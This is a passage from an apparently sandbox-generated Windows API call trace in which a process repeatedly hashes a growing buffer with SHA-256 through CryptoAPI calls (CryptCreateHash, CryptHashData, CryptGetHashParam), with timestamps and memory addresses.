	[0229.830] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.830] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ca90
	[0229.830] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ca90, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ca90, pdwDataLen=0x128ba4) returned 1
	[0229.830] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.830] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.830] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.831] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.831] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0229.831] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cab8
	[0229.831] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cab8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cab8, pdwDataLen=0x128ba4) returned 1
	[0229.831] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.831] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.831] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.831] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.831] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0229.831] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.831] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cae0
	[0229.831] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cae0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cae0, pdwDataLen=0x128ba4) returned 1
	[0229.831] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.831] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.831] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.832] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.832] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0229.832] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.832] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cb08
	[0229.832] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cb08, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cb08, pdwDataLen=0x128ba4) returned 1
	[0229.832] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.832] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.832] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.832] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.832] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0229.832] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.832] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cb30
	[0229.832] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cb30, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cb30, pdwDataLen=0x128ba4) returned 1
	[0229.832] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.832] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.832] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.833] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.833] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0229.833] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.833] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cb58
	[0229.833] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cb58, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cb58, pdwDataLen=0x128ba4) returned 1
	[0229.833] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.833] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.833] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.833] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.833] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0229.833] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.833] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cb80
	[0229.833] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cb80, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cb80, pdwDataLen=0x128ba4) returned 1
	[0229.833] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.833] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.833] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.834] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.834] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0229.834] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cba8
	[0229.834] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cba8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cba8, pdwDataLen=0x128ba4) returned 1
	[0229.834] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.834] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.834] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.834] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.834] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0229.834] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.834] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cbd0
	[0229.834] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cbd0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cbd0, pdwDataLen=0x128ba4) returned 1
	[0229.834] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.834] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.834] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.835] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.835] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0229.835] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cbf8
	[0229.835] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cbf8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cbf8, pdwDataLen=0x128ba4) returned 1
	[0229.835] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.835] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.835] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.835] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.835] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0229.835] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.835] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cc20
	[0229.836] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cc20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cc20, pdwDataLen=0x128ba4) returned 1
	[0229.836] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.836] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.836] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.836] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.836] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0229.836] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cc48
	[0229.836] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cc48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cc48, pdwDataLen=0x128ba4) returned 1
	[0229.836] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.836] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.836] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.836] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.836] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x540, dwFlags=0x0) returned 1
	[0229.836] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.836] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cc70
	[0229.837] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cc70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cc70, pdwDataLen=0x128ba4) returned 1
	[0229.837] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.837] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.837] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.837] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.837] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x560, dwFlags=0x0) returned 1
	[0229.837] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.837] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cc98
	[0229.837] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cc98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cc98, pdwDataLen=0x128ba4) returned 1
	[0229.837] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.837] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.837] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.837] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.837] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x580, dwFlags=0x0) returned 1
	[0229.837] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.838] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ccc0
	[0229.838] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ccc0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ccc0, pdwDataLen=0x128ba4) returned 1
	[0229.838] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.838] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.838] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.838] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.838] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x5a0, dwFlags=0x0) returned 1
	[0229.838] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.838] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cce8
	[0229.838] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cce8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cce8, pdwDataLen=0x128ba4) returned 1
	[0229.838] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.838] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.838] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.839] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.839] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x5c0, dwFlags=0x0) returned 1
	[0229.839] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cd10
	[0229.839] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cd10, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cd10, pdwDataLen=0x128ba4) returned 1
	[0229.839] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.839] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.839] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.839] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.839] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x5e0, dwFlags=0x0) returned 1
	[0229.839] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.839] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cd38
	[0229.839] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cd38, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cd38, pdwDataLen=0x128ba4) returned 1
	[0229.839] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.839] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.839] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.840] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.840] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x600, dwFlags=0x0) returned 1
	[0229.840] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cd60
	[0229.840] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cd60, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cd60, pdwDataLen=0x128ba4) returned 1
	[0229.840] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.840] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.840] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.840] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.840] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x620, dwFlags=0x0) returned 1
	[0229.840] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.840] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cd88
	[0229.840] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cd88, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cd88, pdwDataLen=0x128ba4) returned 1
	[0229.840] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.840] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.840] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.841] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.841] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x640, dwFlags=0x0) returned 1
	[0229.841] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cdb0
	[0229.841] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231cdb0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cdb0, pdwDataLen=0x128ba4) returned 1
	[0229.841] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.841] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.841] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.841] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.841] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0229.841] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.841] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231cdd8
	[0229.841] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231cdd8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231cdd8, pdwDataLen=0x128ba4) returned 1
	[0229.841] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.841] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.841] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.842] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.842] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0229.842] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ce00
	[0229.842] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ce00, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ce00, pdwDataLen=0x128ba4) returned 1
	[0229.842] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.842] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.842] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.842] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.842] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0229.842] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.842] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ce28
	[0229.842] CryptGetHashParam (in: hHash=0x22b6a80, dwParam=0x2, pbData=0x231ce28, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ce28, pdwDataLen=0x128ba4) returned 1
	[0229.842] CryptDestroyHash (hHash=0x22b6a80) returned 1
	[0229.842] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.842] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.843] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.843] CryptHashData (hHash=0x22b6a00, pbData=0x2765c68, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0229.843] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0229.843] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x231ce50
	[0229.843] CryptGetHashParam (in: hHash=0x22b6a00, dwParam=0x2, pbData=0x231ce50, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x231ce50, pdwDataLen=0x128ba4) returned 1
	[0229.843] CryptDestroyHash (hHash=0x22b6a00) returned 1
	[0229.843] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0229.843] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225e30) returned 1
	[0229.843] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0229.843] CryptHashData (hHash=0x22b6a80, pbData=0x2765c68, dwDataLen=0x6e0, dwFlags=0x0) returned 1
